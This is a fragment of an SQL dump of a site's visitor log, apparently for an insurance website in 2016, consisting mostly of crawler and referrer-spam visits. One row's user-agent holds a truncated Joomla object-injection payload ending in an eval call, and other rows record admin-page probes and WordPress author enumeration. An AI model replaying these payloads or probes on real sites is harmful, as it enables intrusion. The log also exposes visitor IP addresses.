help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22512,'0b_8b970c4b8c7bce8807e3198a222d78b5','1461940632','70.184.148.121','wsip-70-184-148-121.rn.hr.cox.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win10','','us','1600 x 900','','','','','','0','0',0),(22515,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942375','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22518,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942378','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22520,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942381','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22521,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942384','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22524,'0b_b2618b927146d68544331c922e786b33','1461942386','184.154.139.23','placeholder.sitelock.com','/?page_id=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(22526,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942388','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22527,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942390','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22529,'0b_f41e540c4ef1b58d73dd12290ad79e57','1461942392','184.154.139.23','placeholder.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(22532,'0b_d5d47141ac06034e0f75c896475ebd67','1461942565','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22533,'0b_426babf18082fc9aec8f545cadac7164','1461942688','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(22535,'0b_426babf18082fc9aec8f545cadac7164','1461942700','69.30.205.218','69.30.205.218','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22536,'0b_426babf18082fc9aec8f545cadac7164','1461942710','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22538,'0b_426babf18082fc9aec8f545cadac7164','1461942723','69.30.205.218','69.30.205.218','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22539,'0b_426babf18082fc9aec8f545cadac7164','1461942733','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22541,'0b_426babf18082fc9aec8f545cadac7164','1461942744','69.30.205.218','69.30.205.218','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22544,'0b_426babf18082fc9aec8f545cadac7164','1461942754','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22545,'0b_426babf18082fc9aec8f545cadac7164','1461942765','69.30.205.218','69.30.205.218','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22547,'0b_426babf18082fc9aec8f545cadac7164','1461942775','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22548,'0b_426babf18082fc9aec8f545cadac7164','1461942786','69.30.205.218','69.30.205.218','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22550,'0b_426babf18082fc9aec8f545cadac7164','1461942796','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22553,'0b_426babf18082fc9aec8f545cadac7164','1461942807','69.30.205.218','69.30.205.218','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22556,'0b_426babf18082fc9aec8f545cadac7164','1461942819','69.30.205.218','69.30.205.218','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22557,'0b_426babf18082fc9aec8f545cadac7164','1461942830','69.30.205.218','69.30.205.218','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(22559,'0b_4d5d8b0ddbc0a7d012764901f1f24cd6','1461943353','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22560,'0b_8df831e14fd3cf587e87fdb259ff202b','1461945178','66.249.64.160','crawl-66-249-64-160.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(22563,'0b_5cd48714788a87850cb67fa2818eb72f','1461945736','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22565,'0b_5cd48714788a87850cb67fa2818eb72f','1461945738','5.9.111.70','static.70.111.9.5.clients.your-server.de','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22566,'0b_5cd48714788a87850cb67fa2818eb72f','1461945740','5.9.111.70','static.70.111.9.5.clients.your-server.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22569,'0b_f41785ebcdab9ae2d2b425ee3761cfb9','1461946974','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22572,'0b_19c87109620d279e5c382e2a29f4371b','1461947369','157.55.39.249','msnbot-157-55-39-249.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22575,'0b_19c87109620d279e5c382e2a29f4371b','1461947394','157.55.39.249','msnbot-157-55-39-249.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22577,'0b_97e54b37e85c9c45e372193b4ae4c4c0','1461948628','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22578,'0b_57a60bce634cca47a12569fee7a5e2bc','1461948902','212.86.219.134','gw-ilk-1.ilk.ka.inobas.net','/robots.txt','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16','','',0,'MacOSX','Safari 4','us','','','Unknown Spider','','','','0','0',0),(22580,'0b_3a79449329c34cb380ccece564750daf','1461949475','5.9.111.70','static.70.111.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22583,'0b_3a79449329c34cb380ccece564750daf','1461949477','5.9.111.70','static.70.111.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22584,'0b_3a79449329c34cb380ccece564750daf','1461949479','5.9.111.70','static.70.111.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22587,'0b_3a79449329c34cb380ccece564750daf','1461949482','5.9.111.70','static.70.111.9.5.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22589,'0b_3a79449329c34cb380ccece564750daf','1461949484','5.9.111.70','static.70.111.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22590,'0b_3a79449329c34cb380ccece564750daf','1461949486','5.9.111.70','static.70.111.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(22592,'0b_471e7df473599c5c1f75b254d9079a46','1461949671','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22593,'0b_5000b2651bfe79f0b0b2d28b0e0b6418','1461949785','52.201.159.209','ec2-52-201-159-209.compute-1.amazonaws.com','/robots.txt','btcrawler','','',0,'','','','','','Unknown Spider','','','','0','0',0),(22595,'0b_5000b2651bfe79f0b0b2d28b0e0b6418','1461949786','52.201.159.209','ec2-52-201-159-209.compute-1.amazonaws.com','/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(22598,'0b_76a71bb0b8c6750032758792e863f7bd','1461951297','172.58.216.24','172.58.216.24','/','Mozilla/5.0 (Linux; Android 6.0.1; SM-G920T Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36','','',0,'Android 6','Chrome 49 Mobile','us','','','','','','','0','0',0),(22601,'0b_c9e1b24d003d28e72a2a9fed80b7d807','1461952729','52.26.248.7','ec2-52-26-248-7.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(22604,'0b_c9e1b24d003d28e72a2a9fed80b7d807','1461952731','52.26.248.7','ec2-52-26-248-7.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(22605,'0b_c9e1b24d003d28e72a2a9fed80b7d807','1461952732','52.26.248.7','ec2-52-26-248-7.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(22607,'0b_66818eac0c282973d27095070da359e2','1461954321','192.99.9.164','ns4009583.ip-192-99-9.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36','','',0,'MacOSX','Chrome 27','','','','','','','','0','0',0),(22608,'0b_cd9b7b5862c745735a1b561d7dc75c98','1461955519','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000','http://dekorkeramik.ru/','',0,'WinNT','IE 6','','','','','','','','0','0',0),(22610,'0b_cd9b7b5862c745735a1b561d7dc75c98','1461955519','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000','http://moneytop.ru/','',0,'WinNT','IE 6','','','','','','','','0','0',0),(22611,'0b_41dcb732fc0d76cc4d273174bfbb1c20','1461955858','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22614,'0b_9e6ac4cb95467079b4f4337bed06a81b','1461956232','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(22617,'0b_182cc4ef4de85065abcb067b9e2f74f2','1461957095','66.249.64.219','crawl-66-249-64-219.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22620,'0b_182cc4ef4de85065abcb067b9e2f74f2','1461957096','66.249.64.209','crawl-66-249-64-209.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22623,'0b_8d6fdb89c2bb71af75f3046e4797c9c0','1461957299','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(22625,'0b_f1038f13f18fc0e614406c54a55fc062','1461958022','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22628,'0b_8de23bb290410c2ea0db8115bc90a8f9','1461958034','207.46.13.109','msnbot-207-46-13-109.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22629,'0b_e48e4a16a303b03331f562a1e1d46db0','1461958348','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(22632,'0b_eda627b5d975330d7ca3cf5a855ea417','1461960162','74.101.57.123','static-74-101-57-123.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwj54cL30bTMAhUKFT4KHRrHDHUQFghCMAM&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.120853415,d.cWw','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(22634,'0b_eda627b5d975330d7ca3cf5a855ea417','1461960164','74.101.57.123','static-74-101-57-123.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(22637,'0b_eda627b5d975330d7ca3cf5a855ea417','1461960173','74.101.57.123','static-74-101-57-123.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(22640,'0b_eda627b5d975330d7ca3cf5a855ea417','1461960179','74.101.57.123','static-74-101-57-123.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(22641,'0b_496bfdc6a5d40751ea59def5c5ea1c08','1461961070','157.55.39.249','msnbot-157-55-39-249.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22644,'0b_cfd38d35c95c2775abb573a605ef2c82','1461961356','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(22646,'0b_e98b7f5b03e218411fcef42c08fd4666','1461963837','172.56.7.80','172.56.7.80','/','Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36','','',0,'Android 5','Chrome 43 Mobile','us','','','','','','','0','0',0),(22647,'0b_f65bf8d3b57696919c70679e9429b410','1461964712','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://ru.meteotrend.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(22649,'0b_f65bf8d3b57696919c70679e9429b410','1461964712','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://ru.meteotrend.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(22650,'0b_f05b2f887168563241e7a6b69726fcd3','1461966375','157.55.39.249','msnbot-157-55-39-249.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22652,'0b_405d7fa107264bcc8eba70e14c4cfc93','1461971084','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)','http://ideibiznesa2015.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(22653,'0b_0c6c447589bba6f47096a0c9185b8b95','1461971163','178.24.113.244','ipb21871f4.dynamic.kabel-deutschland.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22655,'0b_0c6c447589bba6f47096a0c9185b8b95','1461971165','178.24.113.244','ipb21871f4.dynamic.kabel-deutschland.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(22656,'0b_955175c288a511e46ef82e82c0a201a3','1461973961','145.249.188.199','145.249.188.199','/administrator/index.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://EMPIREINS.com/administrator/index.php','',0,'WinXP','IE 6','','','','','','','','3','0',0),(22658,'0b_955175c288a511e46ef82e82c0a201a3','1461973977','145.249.188.199','145.249.188.199','/administrator/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://EMPIREINS.com/administrator/index.php','',0,'WinXP','IE 6','','','','','','','','3','0',0),(22659,'0b_fbc72236c4afc3787f90550e595579bf','1461974404','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(22661,'0b_47e3a872334e5d166cd40ac330e76878','1461975901','144.76.61.21','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(22662,'0b_47e3a872334e5d166cd40ac330e76878','1461975903','144.76.61.21','majestic12.co.uk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(22664,'0b_47e3a872334e5d166cd40ac330e76878','1461975905','144.76.61.21','majestic12.co.uk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(22665,'0b_47e3a872334e5d166cd40ac330e76878','1461975908','144.76.61.21','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(22668,'0b_6b89c773cfc0933ddcea80ce0959d65f','1461976045','136.243.67.139','static.139.67.243.136.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','','',0,'Win7','Firefox 24','de','','','','','','','0','0',0),(22671,'0b_e5acb1da15d2353e6af16ff67278b66a','1461976390','136.243.67.139','static.139.67.243.136.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0','','',0,'Win7','Firefox 24','de','','','','','','','0','0',0),(22674,'0b_8aabc024be662f13ac58b577624a5db5','1461978155','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22676,'0b_8aabc024be662f13ac58b577624a5db5','1461978160','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22679,'0b_f77cdbe72ab42711758cfa7ef1f208f9','1461980291','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22682,'0b_f77cdbe72ab42711758cfa7ef1f208f9','1461980307','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(22683,'0b_3a359e93acda4d4ceb50da6fd06e60d2','1461983464','157.55.39.38','msnbot-157-55-39-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(22685,'0b_bba7b3b3f226c90bbe512f543fe9ab59','1461983978','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]','http://ordernorxx.com/','',0,'WinXP','Opera 7','ua','','','','','','','0','0',0),(22686,'0b_bba7b3b3f226c90bbe512f543fe9ab59','1461983978','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]','http://ordernorxx.com/','',0,'WinXP','Opera 7','ua','','','','','','','0','0',0),(22688,'0b_28906c7bacb3754cbfc211cab920e90b','1461985051','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(22691,'0b_5b03c1aee0d700a8645126a0310727a5','1461985885','157.56.3.66','msnbot-157-56-3-66.search.msn.com','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(22692,'0b_5b03c1aee0d700a8645126a0310727a5','1461985888','157.56.3.66','msnbot-157-56-3-66.search.msn.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(22694,'0b_774940a5afdbd6827eb7011ffdff1b79','1461986445','192.187.114.11','push-router.cakestandchar.net','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:119:\\\"eval(chr(112).chr(1','','',0,'','','','','','Feed Reader','feed reader','','','0','0',0),(22697,'0b_2d3816c36398bb0e265e5ab3f9df1aaa','1461992756','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://www.empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(22700,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992756','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(22703,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992757','91.200.12.26','huangdisisi0708.com','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(22706,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992761','91.200.12.26','huangdisisi0708.com','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(22709,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992763','91.200.12.26','huangdisisi0708.com','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(22710,'0b_76bc09b9ee03d6e8c94b9b3f509459a9','1461992766','91.200.12.26','huangdisisi0708.com','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 